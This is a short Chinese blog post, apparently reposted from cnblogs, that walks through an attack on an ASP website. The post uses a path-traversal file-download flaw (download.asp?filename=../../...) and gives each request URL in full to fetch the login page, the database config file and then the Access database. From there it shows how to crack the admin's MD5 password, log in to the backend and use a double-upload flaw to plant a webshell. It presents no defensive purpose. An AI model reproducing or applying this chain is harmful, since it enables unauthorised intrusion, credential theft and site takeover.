标签:
一般的asp站点都是access数据库(连接sql server 直接可以参考aspx站点的利用方法)。而access数据库可以直接下载,因此利用该漏洞比较简便的方法就是直接下载access数据库,找到管理员密码登陆后台,利用后台的上传功能,上传shell.
确定站点根目录:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../GraduateSchool/dlsd/download.asp
下一个步,找到网站与数据库操作的动态页面,动态页面中一般使用include包含连接数据库的配置文件。
找到后台登陆入口
http://www.testcn/jianshen/F89A1/ Admin_login.asp
下载该登陆界面:
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ Admin_login.asp
打开下载后文件:
可以确定数据库连接文件在inc/conn.asp中
下载该文件
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../ jianshen/F89A1/ inc/conn.asp
打开该文件
可以看到数据库路径。
http://www.testcn/jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
直接下载失败。应该是做了限制。使用下载点下载
http://www.testcn/GraduateSchool/dlsd/download.asp?filename=../../jianshen/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb
打开数据库,获得管理员用户名和密码(密码md5加密)
弱口令,破解获得密码,登录后台
找到上传位置
下载该文件,里面使用通用的上传文件,存在二次上传,构造二次上传页面:
选择两个文件上传,即可获得webshell.
标签:
原文地址:http://www.cnblogs.com/yuleitest/p/5722535.html